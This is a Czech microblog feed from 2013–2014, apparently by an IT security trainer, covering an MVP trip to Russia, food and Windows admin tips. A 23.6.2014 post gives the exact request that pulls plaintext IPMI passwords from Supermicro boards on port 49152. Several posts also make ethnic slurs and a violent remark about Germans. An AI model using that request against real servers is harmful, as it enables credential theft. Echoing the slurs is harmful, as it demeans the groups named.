Tak to jsem se musel fakt smat - http://www.dfens-cz.com/view.php?cisloclanku=2014071501 - "britove a francouzi take maji letadlovou lod" :-D
9.7.2014 16:19
Jak poznáte, že máte nainstalován Windows 2012 R2 "Update"? Spustíte MSINFO32 a v položce Hardware Abstraction Layer musí být hodnota alespoň 6.3.9600.17031.

8.7.2014 11:41
Aaa, tak jenom jsem se trošku unáhlil - na to, aby Network Monitor zobrazoval i pakety, které přicházejí do Destination virtuálního počítače ze Source počítače - je potřeba pro tu danou sledující síťovku zapnout P-Mode. To uděláte v Network Monitoru například v Capture Settings, nebo rovnou na Start Page je dole čudlík - pozor, pro každou síťovku zvlášť. Takže port mirroring v Hyper-V už není žádný problém ani s Network Monitor.
8.7.2014 11:35
tak zdá se, že Network Monitor od Microsoftu neumí zobrazovat pakety, které přijdou přes port mirroring v Hyper-V do Destination virtuálního počítače. Když jsem si nainstaloval Wireshark a WinPCap, tak úplně v pohodě. Jdu to prozkoumat ještě o trošku více, třeba se to dá někde v Network Monitoru zapnout.
6.7.2014 15:42
Tývolé, co to jéé: Internet Explorer has modified this page to help prevent cross-site scripting
5.7.2014 16:23
Hodni slovensti policiste mi naparili pouze 20Eur pokuty. Kluk a holka zrejme nemeli radar, pac jinak bych uz nejspis nejezdil :-)
5.7.2014 16:23
Cukrarna Dino ve Zline opet nezklamala svou uuuuuzasnou zmrzlinou!
24.6.2014 8:52
pokračování úspěšné série o dírách v SuperMicro - aneb dorazilo mailem:

vami uvedeny problem byl resen a vyresen jiz v lonskem roce novou verzi IPMI firmwaru. Viz. odkaz nize.
http://www.supermicro.com/support/faqs/faq.cfm?faq=16536

Upgradujte si prosim IPMI na posledni moznou verzi nejlepe na vsech vasich serverech.
23.6.2014 19:16
dorazilo poštou. přikládám v nepozměněné formě:

V Supermicro pracujou odborníci :)

Bezpečnostní tým CARI.net, zjistil, že IPMI/BMC - Supermicro základních desek obsahuje binární soubor, který ukládá přihlašovací hesla ve formátu prostého textu a je k dispozici ke stažení soubor pouhým připojením ke konkrétnímu portu 49152. Pokud je management dostupný z internetu, je možno tento soubor snadno získat "GET /PSBlock". Team provedl skenování a získal tak hesla k 32 tisícům serverů. Je dost zarážející, že je management u tolika serverů dostupný z internetu. A ještě víc zarážející je, kolik hesel bylo defaultních.
http://www.root.cz/clanky/postrehy-z-bezpecnosti-karty-supermikro-umoznuji-stahnout-hesla/

A já potvrzuju, že to fakt funguje, na heslo se prostě člověk podívá na adrese http://ip_adresa_IPMI:49152/PSBlock

23.6.2014 15:42
No musim teda rict, ze oproti vsem moskevskejm nadrazim, na kterejch sem byl a metro stanicim, tady v Brne na hlavnaku je me na zvraceni. A napriklad takova Beloruskaja je uplne atmosfericka.
23.6.2014 14:50
Čéééeeeeeééééeeeeéeeéééeskóóóóóóóó!
23.6.2014 11:46
Prave sme dosedli ve Vidni. Po ceste se krasne menila krajina - v Rusku sirokodaleko nic, v obcasne vesnicce hnedy silnice (no asfalt baby), stokilometrovy pruseky lesu neznamejch ucelu, obcas pouzity na draty. V Belorusku zmena pustiny na pustinu bazinatou. V nekolika mistech regulovany baziny. Vesnicky stejne jako v rusku z vrchu vypadaji jako smetaky. Na hranicni care s Polskem zmena jako prase - vsude policka, pekny organizovany nahusteny vesnicky, silnice sede (tzn asfalt), obcas hlinene pruseky v mistech kde se stavi dalnice, puda vyuzita a organizovana do posledniho metru. Slovensko nadherny vesnicky v kopcich, malinke, ale utulne, vsechny strechy barvy normalnich tasek a ne dosek porostlych mechem (tak to bylo uz v Polsku). Prelet do Raichu, vsude vetrniky, jak u blbejch :-)
23.6.2014 6:53
... ani prestavam si byt jisty, ze ten burgerking byl alespon neskodne prijatelna varianta. Ale tak snad to vyjde rychle a bezbokestne :-)
23.6.2014 6:53
Vnukovo letiste je parada. Ve dvou kavarnach maji prd ve forme dvou zakusku a sendvice, ze kteryho je me na pohled na bliti. A pak burgerking, coz na snidani neni nic, ale lepsi nez dratem do voka. Internet na pul hodiny a nejde me zmenit MAC adresa, sakra.
22.6.2014 22:23
Total mayham. Na mezinarodnim letisti nekdo neumi anglicky? Tak tady na Vnukovu nemluvi ani slovo anglicky ani borec na checkinu, ani jedna pani ve vobchode s vodou, ani dva borci na security ceku. Vcelku jsem se nedivil, ze to tak vypada ve 4* hotelu v Uglici, ale tady? Paneboze!
22.6.2014 19:10
Zase zpet v Moskve. V baru Help na veceri a pomalu odjezd na letiste.
22.6.2014 16:05
Tak uz jsme 2 hodiny na ceste busem dom. Vsude jenom lesy, louky, obcas dum, jinak prd. Nechapu. Pritom takova normalni krajina. Neobdelana pole, pripadne prolezla plevelem. Tak jeste udajne 2 hodiny do Moskvy, potom hodinu na letiste, potom tam budu sedet do 10 do zitra a pak konecne domu :-)
22.6.2014 16:03
... a Kaliacin ma navic delo. Na coz jsou pysni, protoze Uglic to nema.
22.6.2014 16:03
Zda se, ze kazda dedina obsahuje pruvodkyni, plus pokud tato neumi anglicky, ma s sebou prekladatelku. Kazda dura musi mit alespon dve legendy - o jmene jak vzniklo a potom jeste jednu, aby nebyla nuda.
22.6.2014 16:03
Akorat ty sedacky jsou trosku prosezeny, prave jsem si vrazil trubku do zadku
22.6.2014 16:03
Kdyz sme odjizdeli z Ugliče, nakonec to nebylo spatne mesto :-) ale hlavne zrovna letime po volze v Rakete, naprosto uzasna rychlolod co lita po vode. Skoro to nedela vlny a prakticky se to nehne. Zradlo. Takze aji kolegove emvipi co se do rana nalivali jamesonem nemaji zaludecni potize :-)
22.6.2014 16:03
Toaletě rabotajet
21.6.2014 18:43
Zbytek Ugliče - kostel kde zabili syna Ivana Hrozneho. Plus velikej "turist paradise". Nakoupil jsem dary, takze vsechno je splneno.
21.6.2014 18:39
Prohlidka mesta - v podstate tu neni nic. Maji vodni elektrarnu, u ktere je muzeum. Puvodne se rozmysleli, jestli vubec otevrit to muzeum uplne pro verejnost, nebo jenom pro inzenyry s bumazkou, nakonec ustoupili ze svych principu a je to pro vsechny. Ale do elektrarny se nejde, protoze je to strategicky objekt.
21.6.2014 11:20
Cesta z Ribinsku do Ugliče přinesla několik poznání. Zaprve nechapu jejich "vesnie". Vzdycky to ceduli s nazvem, ale jsou to treba tri domky. Zadny namesti, obchod, nic. nekdy obchod ve forme boudy u cesty. Potom opet par kilometru lesy a pak zase to stejny. Ve vesnicich nejsou asfaltky, takze maximalne tak ta prujezdna na hlavni silnici. Rikam maximalne, protoze dvakrat byla ta hlavni silnice normalne z kamenu a pisku.

Vsechny domky ze dreva. 50% v rozpadu, ale zda se ze obydlenych. Pri tom obrovskym mnozstvi lesu okolo nechapu proc si to neopravi. Zrejme to jsou ajtaci. Taky nemam doma na nic cas :-)
21.6.2014 11:14
Tak sme se ráno odhlásili z Ribinsku a přejeli s dalším šíleným řidičem do Ugliče. Bydlíme v hotelu jak na zámku. A k obědu máme teďka Uchu, tzn rybí polívku. Ale je moc dobrá. Nesmrdí to rybou jak bych očekával.
20.6.2014 18:14
Dneska opet luxus z lososa. Navic s kousky rajcat misto cibule a kousky oliv a nekolika platecky okurecek. Parada!
20.6.2014 13:30
Tak to je hardkor, ten cernej krapnik v punkevnich jeskynich, co plni prani, fakt funguje. Janek si pral tablet. Tak jsem ho tedka vyhral v tombole. Kuuuuul. Teda Nokia 1520, neni asi uplne tablet, ale placka je to poradna.
19.6.2014 18:49
Neuveritelne dobrej lososovej "salat": koupi se cerstvel losos, nareze se na malinke kousivky a na den se to nalozi do osolene vody do lednicky. Druhej den se do toho uz jenom prihodi trosinka cibulky a pak se uz jenom uziva s francouzskou bagetou.
19.6.2014 6:44
Na pokoji jsem s borcem z chorvatska, kterej se jmenuje Bernardýn Klátič.
19.6.2014 5:51
A ted zacinaji zazitky. Luzkovej starej vagon plnej mvpiku na 400km ceste do Ribinsku. To je neco neuveritelnyho. Doprovazi nas dve 50lete letusky, zkontrolovaly nam pasy pri vstupu oproti listku. Vsude to tu voni starym ale cistym vagonem. Ted roznasi papuce.
19.6.2014 5:51
To jsou kecy, ze stavi z cihel rovnou na sobe aniz by se prekryvaly. Na nekterejch domech to tak nemaji :-)
19.6.2014 5:51
Moc sem nechapal proc jedem po te ultrarovne, 400km dlouhe, dvou az tri kolejne trati celou cestu ctyricitkou, nez sme presedli do autobusu. Ted jedem dvacitkou pac rychlejc to nejde. Zrejme ten vlak to bral ze solidarity :-)
19.6.2014 5:51
Furt jenom rovina a nic nez rovina...
18.6.2014 14:24
tak jsem byl v Moskvě a přitom jsem tu vlastně ani nebyl. Viděl jsem letiště 35 minut od Moskvy a metro zevnitř vozu a MS zevnitř budovy. A pomalu se chystám na odjezd vlakem (jen místo na sezení) do Ribinsku. To je pouhých 10 hodin cesty. Od 21:00 do 7:00. To bude parádička. Zajímalo by mě, jestli budeme držet hlídku, nebo jestli přijdu po cestě o noťas i počestnost.
18.6.2014 12:39
Uf, prednaska je za mnou, jenom jedno demo fejlnulo. Pohoda. Tisice gratulaci a dekovnych doposu.
18.6.2014 9:38
ceny ponekud vyssi nez u nas, po prepoctu. tzn. Ritter Sport za 54,- rozpecenej sendvic za 84,- a dvojitej snikrs za 27,-
18.6.2014 8:18
to je lahoda. kaficko. zakusek. internet. lidi mluvi anglicky.
18.6.2014 8:10
A mame s sebou zrejme i jednoho mentalne postizeneho MVPika...
18.6.2014 8:10
... zde ovsem nezabralo :-)
18.6.2014 8:10
Zda se, ze ridic busu si uz cca rok nemyl vlasy. Muj tatka to nazyva samocisteni.
18.6.2014 8:10
Napis na buse do MS kampusu: Krylatsky Hills - recreation of work. To je nejakej volnej preklad z prace osvobozuje?
18.6.2014 8:10
Moskva musi byt obrovska, protoze metro i v centru ma zastavky v rozestupu 5 minut. A pri te rychlosti to nechapu.
18.6.2014 5:59
Tak jsem opustil hotel a jedu na Microsoft. Je zajimavy, ze pri odchodu jste museli predlozit bumazku ochrance, ze muzete odejit. Asi abyste nezdrhli bez placeni :-)
17.6.2014 19:14
to bylo peklo. už jsem tu. na letišti ještě ok, tam byly terminály v angličtině. ale jak mě to vyhodilo na Kijevskaja metru, tak jsem skončil. všude jenom pekelná klapzubka. Sice to přečtu, ale každé slovo mi trvá tak 30 sekund. Takže jsem tam bloudil jak vyvoraná myš. Nakonec jsem šel pro lístek za hodnou paní v okýnku, která sice taky neuměla anglicky (jako nikdo) ale rozuměla mi "celý den", tak jsem dostal lístek na "24 času" a nakonec to trefil. Přečíst potom už ceduli v metru byl úplná hračka a po 2 hodinách pojíždění a chaotického přestupování jsem vystoupil na své stanici. Zde jsem navštívil 4 hotely, všechny úplně stejně vypadající a stejně pojmenované Orechovo. První byla pekelná ubytovna. Naštěstí mě tam nechtěli. Druhý byl o trošku lepší, před třetím už stála docela nová auta. Nakonec to tu je docela pěkné. Ale už tu sedím a mají dokonce internet.
17.6.2014 18:51
Pokud mam teda hodnotit, tak Moskvani super. Lidi vypadaji jako lidi, ne jako gang cernejch pristehovalcu smrdicich kebabem a jinejma africkejma puchama - porovnej s Parizi. Zensky se stroji jako zensky. Ne jako tetovany rokerky v teplakovejch bundach a volezlejch tenaglich - porovnej s Ceskem. Dokonce i mila pani v
"kassa" v metru me rozumela "jeden deň".
17.6.2014 15:53
Uff venku z letiste a nikdo me notebook nezabavil :-)
17.6.2014 15:31
Prvni dve stranky v rustine jsou za mnou a normalne, dostali jsme k obedu v letadle i vino. Tak to je parada. Jo a pouzil jsem svoje prvni ruske slovo "jablecnyj" na objednani dzusu :-) nevim jestli to bylo dobre, ale dostal jsem fakt jablecny :-) Furt nevim ale jak se podekuje...
17.6.2014 9:40
nevím proč ale na letišti se mi vždycky chce čurat tak 2x za půl hodiny
17.6.2014 9:26
sedim v buse a zrovna jsem se zamiloval do Ruštiny. To je úplně stejný jazyk, jako čeština. Akorát to má jiný font. Například "pravaja ruka sudorožno sžimala dumku, a levaja razmazivala po licu sljezi i sopli." To je prostě paráda!
12.6.2014 21:55
Takhle neznej klid ve meste na ulicich je tu kvuli fotbalu?
11.6.2014 5:53
Cd je cd. Jako vzdy. Sice se borci rozhodli, ze budou v jednicce davat tzv. "premiove sluzby", coz obsahuje noviny a pul litru vody, a je to prijemne vylepseni, ale zretelne nepochopili jak se s tim chovat k zakaznikum - tento tyden rano nejezdi jidelnak, takze voda neni. Kdyby to nebylo cd, tak by to nejak zaridili. Kdyby takovy SA jednou jeli bez kafomatu, tak uz by s nima priste nikdo nejel. Chapu, ze treba kuchar dostal prujem a musi tenhle tyden vydrhnout po nem jidelnak, ale ze by jim dosly zasoby vody a trvalo tyden to doplnit?
10.6.2014 6:29
od 17.6. do 22.6. budu na MVP summitu v Rusku. Dneska jsem v agendě objevil něco, co se jmenuje "Geek Speed Dating", bez udání obsahu. Od 19:00-20:00. Tak nevím, co to má jako být?
9.6.2014 8:56
dorazilo mailem k mé rychlovce o OMV a ibod:

to není věc OMV, ibod je přejmenovaný Bonus program od České spořitelny. Nedávno mi přišel e-mail, že mají super akci ve spolupráci OMV. Vzhledem k tomu, že tankuji u Tank-Ono pokud to jen trochu jde, tak jsem to ani nečetl. Ale je to tak, že "slevu nedostaneš zadarmo" aneb "čím déle spoříte, tím méně máte "...
2.6.2014 18:28
Dneska mě nadchlo OMV. Mají teď novou kartu. Jmenuje se to ibod.cz. Za jeden litr dostanete 1 bod. Za 10 bodů dostanete 1 Kč slevu. Tzn za cca 370 Kč je to sleva 1 Kč. Nebo třeba 5,5 Kč na plnou nádrž. To jsem se smál, až jsem se za břicho popadal :-)
2.6.2014 14:40
Na jedné mašině jsem právě nalezl uživatele UpdatusUser. Má to popisek: "Used to provide NVIDIA software updates". Co tohle proboha má znamenat???
29.5.2014 7:59
Ooo boze. Tu v restauraci Olive vymenili zamestnance. Squadra kompetentnich a aktivnich chlapu tu byla par mesicu asi jen kvuli rozbehu - pripadlo mi to podezrele. A potvrdilo se. Nastoupila parta ukrajinek, ktere ani po tydnu jeste neumi namarkovat nic na pokladne, pripadne stoji za pultem, nedela nic a ani tak si neni schopna vsimnout dalsi prichozi osoby, ktera pribyla k te jedne jedinne, co tam uz nejakou dobu stoji. O boze.
28.5.2014 12:48
testováno na důchodcích? proč asi? zřejmě kdyby se to někde vysekalo, aby se minimalizovaly ztráty :-) přijímají zřejmě jen adepty s už propadlým úmrťákem :-)

článeček zde
21.5.2014 23:01

k Altairovu včerejšímu komentu ohledně PowerShell bych možná doplnil i svůj oblíbený duet Hejma-Babica: „ty vole, vždyť se to nedá žrát“ – „ale můžeš si to vařit doma“

20.5.2014 18:24

po mé dnešní přednášce o PowerShell pro vývojáře Michal Altair Valášek prohlásil toto, cituji: „Po talku soudím, že PS má srozumitelnost Perlu, syntaktickou eleganci PHP, rychlost Javy a editační pohodlnost JavaScriptu“. Řek bych, že má pravdu :-)

14.5.2014 11:35

k lenovo klávesnici jsem také dostal následující pěkný odkaz: http://diit.cz/blog/jak-moc-lze-zprznit-rozlozeni-notebookove-klavesnice

14.5.2014 7:34
To snad není ani možný. Nový Lenova, podnikový T5xx nemají klávesu Pause? To se někdo asi zbláznil. Hlavně že ušetřili těch několik kilogramů a tolik plastu. Ekologie je to hlavní :-)
24.4.2014 22:01
Prave jsem v budejovicich na namesticku u Slavie zazil neco nepochopitelnyho.
24.4.2014 16:19
krása powershellu - jak zjistit IP adresy všech DC: (dsquery server -o rdn | % { [net.dns]::resolve($_).AddressList[0].IPAddressToString }) -join ','
24.4.2014 9:52
zdá se, že se zvýšily minimální instalační požadavky na Windows 2012 R2 - setup se mi odmítl zpustit při 512 MB a musel jsem tam přidat na 768 MB RAMu. No totó :-)
18.4.2014 12:18
Právě jsem dostal od alzy "nabídku přesně na míru" ve formě zlevněnýho "Elektronická licence Symantec Norton Mobile Security 3.0 na 24 měsíců". Co myslíte, koupím já si to? :-) Vždyť je to přesně mě na míru! viz moje dřívější: 
zde a zde
18.4.2014 7:04

tak konecne po letech snad, se mi na java.com zobrazilo “congratulations, you have java”. Ne ze by me to nejak tlacilo, mit ji, ale kdyz uz se to tu roky aktualizuje a nikdy to nefungovalo... Taky by me zajimalo, co to je za trapnost, aby mi to porad nabizelo ten podivny Ask toolbar. To snad nema Oracle za potrebi, ne?

16.4.2014 17:40
Tak na Windows 8.1 je sluzba Spot Verifier. V pristi verzi to bude nejspis uz rovnou G-Spot Verifier :-)
10.4.2014 17:32
Head shot or chest shot? Well, ma'am, I favour the throat shot. If you hit it just right, you can make their heads come off.
10.4.2014 15:49
Jasne, jak radi "bezpecnostni experti" tak nejlepsi je - v okamziku, kdy se provali nejaka openssl dira v implementaci TLS (kterou tam stejne dala NSA), a je k tomu konecne dostupny verejny exploit, ktery si muze kazdy stahnout - zacit zbesile menit hesla.

Tzn. slusne weby stejny neprenasely heslo uvnitr TLS v plne forme, ale i vevnitr sifrovane. Takze ho stejne nikdo nezna.

Zatimco jeho zmena se bude zarucene prenaset v plne clear-text forme, takze je to sen kazdyho hackera, abyste si ho urychlene zmenili driv, nez ti webari svoje linuxovy plecky zaaktualizuji

A to stoji za to!
9.4.2014 8:37
Baj baj windows xp!
7.4.2014 8:13
Tak zase jednou hezke pondeli!
4.4.2014 9:55
Tímto oznamuji a rovnou si i gratuluji k narození dcerky Jůlinky, dneska v 5. Ne že bych na tom měl moc velkou zásluhu, odrodilo se to samo zatímco já jsem spal s Jankem doma :-) Dobré na tom je, že původně trošku ohrožené konání dvou WUG událostí v Brně a v Trenčíně v týdnu po velikonocích je v pohodě. Špatné na tom je, že nevím, jak proběhnou moje livemeetingy, ale vynasnažím se to uskutečnit!
2.4.2014 9:20
proč vůbec bych si někde nastavoval DNS server 8.8.8.8. Vždyť forwarding nepotřebujete. Váš vlastní DNS server může bez problémů dělat kompletní překlad pomocí root serverů, ne? V podstatě vůbec nechápu, proč se forwarding používá. To bylo dobré před sto lety, kdy se těch několik DNS dotazů denně přenášelo po holubech a trošku to přece jenom zatěžovalo zbytek firemního připojení k internetu.
http://technet.idnes.cz/turecko-presmerova-internetovy-provoz-f0u-/sw_internet.aspx?c=A140331_122224_sw_internet_vse
1.4.2014 15:51
Dear Ondrej Sevecek,

Congratulations! We are pleased to present you with the 2014 MicrosoftR MVP Award! This award is given to exceptional technical community leaders who actively share their high quality, real world expertise with others. We appreciate your outstanding contributions in Enterprise Security technical communities during the past year.
1.4.2014 14:08
Minulý týden jsem narazil na pěkné porovnání kvality Bing vs. Google. Prostě jsem potřeboval zjistit, jak dostanu do Windows 2012 Flash Player plug-in. On je baj dyfólt ve Windows 8, takže na Windows 2012 musí být taky. Tak jsem to šel vyhledat. Jako náhodou se mi připletl do hledání Bing, takže jsem to zkusil a vidím, že nic nevidím. Tak jsem to zkusil na google s úplně stejným dotazem a hned první odkaz. Tak to prostě je, milé děti. Zkuste si sami vyhledat:

windows server 2012 internet explorer flash player add on
28.3.2014 12:11

To je klasika - zase jeden chytrej z VMWare se snazil nahradit Sysprep, jako jedinou podporovanou metodu klonovani pocitacu:
link tady

Takze je snad kazdemu jasne co to znamena. Ten jejich QuickPrep je na hovno. Protoze kolik dalsich programu s tim nebude fungovat, he?

20.3.2014 20:43
a uz je skoro tri hodiny jaro!
20.3.2014 16:15
Dnes me opet potesil Reacher: "I could impress upon them the error of their ways"
17.3.2014 19:19
Tak restaurace u Bulinu ma znovu jednicku s hvezdickou. Nene, se dvema. Nekurak, luxusni plzen, luxusni koleno. Ale hlavne, extremne prijemna obsluha ve forme asi deseti cisniku. To se casto nevidi.
11.3.2014 12:24
5.3.2014 20:24
4.3.2014 9:02

http://vladimirkroupa.blog.idnes.cz/c/399193/Neprehodnotime-pristup-alespon-k-zakladnimu-vojenskemu-vycviku.html

 

za mě ne. Nevím proč by byl potřeba povinný výcvik. na to, aby se lidem rozdaly kvéry a poslali se do akce stačí když je bude 14 dní někdo buzerovat. já bych se spíš zabýval otázkou, na co je nám protichemická specializace v NATo. až na to dojde a někdo nás napadne, tak bude zbytek NATa akorát kecat vo tom, jak přestanou jezdit do ruska na dovolenou a jak tahle sankce chudáka putina úplně vypumpuje a my tady budem pobíhat v gumovejch pláštěnkách

 

podle mě je ideální, aby si každej dom koupil kvér. další válka bude evropská a bude přirozeně v podstatě občanská, tudíž gerilová. takže nejlíp člověk udělá, když bude mět doma luparu a pořádnou pixlu nábojů, aby mohl ty němčoury, co mu přijdou znásilnit manželku a děcka, pěkně provětrat.

3.3.2014 18:59

dorazilo mailem, sice už před 14 dny, ale pořád relativní. Takže děkuji!

 

k informacím na vašem blogu jen doplňuji, že už vyšla oprava na ten problém s čipovými kartami a novým klientem RDP 8.1 na Windows 7.

http://support.microsoft.com/kb/2913751

Kromě toho také vyšla nová verze RDP 8.1 klienta pro Windows 7.

http://support.microsoft.com/kb/2830477

28.2.2014 0:33

Aktualizoval jsem právě svoje dva skriptíky na testování Exchange Autodiscover a Exchange ActiveSync.

 

Ke stažení je to tady:

https://www.sevecek.com/Files/ActiveSync-Testing.ps1

https://www.sevecek.com/Files/autodiscoverTesting.vbs

 

Případně i jejich TXT verze:

https://www.sevecek.com/Files/ActiveSync-Testing.txt

https://www.sevecek.com/Files/autodiscoverTesting.txt

27.2.2014 20:20
Zkusil jsem strcit do samopokladny v tescu tu v praze dvojeuro. Dalo mu to zabrat, ale nakonec to vyplivnul.
27.2.2014 20:04
Those guys didn't search my pockets?
No
I should kick them in the head again. It might raise their IQ.
26.2.2014 20:58
... but Reacher's personal rule of thumb was never to revive a guy who had just pulled a gun on him. He was fairly inflexible on this matter.

Je to proste drsnak :-)
25.2.2014 16:06
nejlepší olympijské hry pro česko v historii - jsme pátí v pořadí podle počtu medailí na světě:
http://vetvicka.blog.idnes.cz/c/398025/Nase-nejlepsi-hry-skoncily-Ale-byla-to-ruske-Hry-Zapomente.html
teda jsme - no prostě chápu, že já nejsem, to jsou ti sportovci, ale stejně je to dobrý pocit :-)
24.2.2014 10:43
The NSA is the only branch of the government that actually listens to people.
21.2.2014 11:24
Eset je opravdu super bezpecny firewall. Kdyby to cas od casu neco nehlasilo, tak by si to zrejme lidi nekupovali :-)

"Detected attack ICMP Flooding".

To je zajiste jeden z nejvic nejnebezpecnejsich ultraznicujich utoku na svete!
21.2.2014 9:57
Tak to se na mě nezlobte, ale někomu v MS zřejmě hráblo. Jako admin si přidáte novou klávesnici. Například anglickou. Nastavíte si ji jako výchozí. Ale jen pro sebe. klávesnici pro přihlašovací obrazovku vás změnit nenapadne, samozřejmě vás to neupozorní. Založíte nový účet a dáte mu heslo se speciálními znaky. A pak se na něho nepřihlásíte, protože ten nový účet nemá na své přihlašovací obrazovce anglickou klávesnici. A ani on-screen-keyboard neumí přidávat klávesnice. Tolik let vývoje!
19.2.2014 15:53
Aaaaah, zase po mesicich nejlepsi zmrzlina na svete! Ve Zline v cukrarne.
18.2.2014 12:04
Jsem uz podruhe v Comedor v Ostrave a opet paraaadni!
10.2.2014 16:45
Dobry baleny makovy zavin je tezko sehnat. Zde moje zkusenost: tesco super, penam super, delta fuj. Tedy samozrejme nevim, jestli se to nelisi podle mista vyroby. Situaci budeme pro vas i nadale sledovat.
10.2.2014 9:41
Hezke pondeli! Chapu ze to je spatny den, tak proto vam preju aby byl aspon trosku lepsi :-)
6.2.2014 14:42
vcera nam prisel spam s prilohou january.scr. bylo to opravdu dobre napsane,
ze jsem si sam nebyl jist (50:50), jestli to je spam/vir, nebo opravdu report pro kolegu.
prohnal jsem to 36 antiviry a vsechny tvrdily, ze je to CISTE/OK. radeji jsem to smazal, kolega nic necekal.
dnes to zna porad jen 7 z 36 (Trend Micro, F-Secure, Dr.Web, BitDefender, AVG, AVAST!, Arcavir) !!!
Neznaji to porad ani NOD32, Microsoft, Symantec, ClamAV, Comodo, Kaspersky, McAfee...
http://r.virscan.org/report/ef11824b8c5508478045aff492d3029d.html
5.2.2014 6:50
heslo je pořád jenom heslo. ztížit prihlašování je samozřejmě žádoucí, ale pokud je ten útočním internistou, tak to je úplně zbytečná komplikace:

http://ekonomika.idnes.cz/ceska-sporitelna-zvysila-bezpecnost-dst-/ekonomika.aspx?c=A140204_223159_ekonomika_zt
1.2.2014 9:05
Je u nas na navsteve holcicka, ktere jeji mamka rika NATka. No ptal jsem se, jaky ma na sobe portforvardingy, ale nesetkalo se to s pochopenim :-)
31.1.2014 16:29
přišel mi dobrý spam - review alcohol rehab centers :-)
30.1.2014 11:05
ještě že XPčka už konečně končí, protože když máte uvnitř winnt.sif hodnotu AutoPartition=1, tak si to nevybere první HDD na IDE 0/0, ale druhý HDD, tzn. na IDE 0/1. Jako u blbejch. Bez ohledu na velikost volného místa.
27.1.2014 12:59
zaktualizoval jsem článeček o AppId a HTTPS binding pro Windows 2012, kde už je direct hosting i pro AD FS a na Windows 2012 R2 i pro Web Application Proxy (WAP):
http://www.sevecek.com/Lists/Posts/Post.aspx?ID=9
27.1.2014 9:47
na windows 8.1 zmizelo z průzkumníka Map Network Folder?
21.1.2014 23:21
Soucasti vybaveni ctyrhvezdickovyho hotelu jsou spubty do usi?
21.1.2014 17:30
Diky za ShowIT Kosice, byla to parada!
20.1.2014 9:34
Zase na ceste do svych milovanych Kosic. Jenom je skoda ze je tak sychravo. Jizda pod Tatrami, to vzdycky miluju. Tak pekne pondeli a usmejte se, to clovekovi zvedne naladu.
19.1.2014 10:25
Tak gay spam jsem snad jeste nedostal :-)
16.1.2014 17:17
tak MS nám pěkně zdražil MCT - od června 2014 bude stát roční MCT licence - tedy možnost školit autorizované MCT kurzy - už 800 USD oproti stávajícím 400 USD. Pěkně pěkně. Dobrá metoda jak nasrat zákazníky nepřímo. Místo aby MS vytáhl prachy přímo ze zákazníků, zvýší cenu za lektora a tím nechá školící střediska, aby zvedla cenu studentům sama.
15.1.2014 8:26

libí se mi názvy souborů aktualizací pro SharePoint Foundation - ubersts :-)

14.1.2014 5:57
Hezky den vsem! Chtel jsem vam to poprat uz vcera, ale nakonec me to pondeli nejak premohlo :-)
9.1.2014 8:39
něco nostalgie za Windows XP: http://jensovsky.blog.idnes.cz/c/390744/Konec-XP-konec-jedne-ery.html

8.1.2014 0:34
Ultraprace na prevodu libovolneho HTML na prosty text konecne dokoncena. Uf.
6.1.2014 8:31

dorazilo mailem ohledne kvality ridicu v Norsku:

 

treba v CapeTownu v JAR meli system, ze semafor byl az ZA krizovatkou (jako by se

u nas semafory otocily o 180’) a platilo tam pravidlo, ze i kdyz svitila cervena, ale z prava

(jezdi vlevo jako v Anglii), tak clovek mohl doleva jet. Meli tam jeste nejake dalsi podminky, nekdy se mohlo jet i rovne nebo doprava. Ve meste to bylo jinak, nez mimo... mel jsem auto pujcene jen na 1 den, tak jsem to odmitl studovat a proste jsem stal na cervenou jako v CR a kdyz na mne zacla auta za mnou troubit, tak jsem teda jel ;o))

27.12.2013 20:02
Jak jsem právě zjistil, cmdlet Test-Path v PowerShellu testuje existenci i hvězdičkových (wildcard) jmen - tzn. pokud si necháte otestovat něco jako tools*.iso, řekne to $true i v případě, že tam je takových .ISO několik. Týjo, nevím jestli to je zrovna přesně ta funkce, kterou bych očekával. Někdy moc agilnosti škodí.
27.12.2013 11:37
povánočních 12km se projevilo pěkně ztvrdlýma nohama. neva, aspoň jsem snad vypotil něco cukroví.
24.12.2013 8:53
Hezke vanoce vsem!
18.12.2013 20:35

jak indžektnu autounattend.xml do virtuální diskety .VFD? Když nemám nástroj, který by tu disketu dokázal mountnout, nebo nějak jednoduše editovat? A musím to udělat co nejjednodušeji v PowerShellu? Vyrobil jsem si prostě šablonový .VFD, který obsahuje autounattend.xml soubor. Jenže ten soubor obsahuje jen samé XXXXXXXXXXX. 60 kB iksek. No a já to prostě otevřu binárně jako soubor a tu dlouuuhatánskou sekvenci prostě natvrdo přepíšu nějakým skutečným XML, které zrovna potřebuju, a zbytek doplním mezeram. No není to geniální?

18.12.2013 13:25

Tak to mě podrž. Zkusil jsem teď zrovna Autoruns od Sysinternals a ti inteligenti filtrují hodnoty v klíči Run, které spouští nějaký PowerShell skript jako „Windows entries“ a tudíž to nezobrazují. Tak to je opravdu inteligentní řešení. Dokonce to hlásí, že je vše korektně digitálně podepsáno, bez ohledu na to, jestli je ten skript digitálně podepsán, nebo není. Trapárna! Jak říkám už dlouho, rusinovič není žádnej lumen.

14.12.2013 10:51
FW: problém s připojením RDP za použití čipových karet.

Zřetelně to MS s těma novýma klientama zrovna nevychytal:

A tady je dalsi apdejt kurvic dole v mailu. Mozna kombinace tech dvou.
Tak jsem nakonec našel aktualizaci, která dělala problém. Po jejím odstranění už vše funguje.
http://support.microsoft.com/kb/2830477/en
14.12.2013 10:50
přišlo mailem, tak bacha:

Už jsme na to narazili několikrát. Když si člověk nainstaluje volitelnej update http://support.microsoft.com/kb/2592687 tak se při připojování na RDP přes TS Gateway v tý sešně nenačte čipovka, jako kdyby nebyla do compu vůbec strčená. Odinstalace toho updatu to spraví.
6.12.2013 16:10
Shiiiit, ulitlo mi letadloooo
6.12.2013 12:40
Clovek by neveril ze i v norsku muzou silnicari zaspat :-)
6.12.2013 9:13
napětí vrcholí, odletím či neodletím?
6.12.2013 9:00
celý týden měli fazole, ale nebyly pálivé. nakonec, dnes, se mi podařilo objevit tabasko. bomba. takže snídaně v klidu, buřtíky, vajca, pálivý fazole, šunka. dneska sem si nedal žádnou zeleninu. teď mě bude blbě až do zítra. ale jsem šťastnej
5.12.2013 21:09
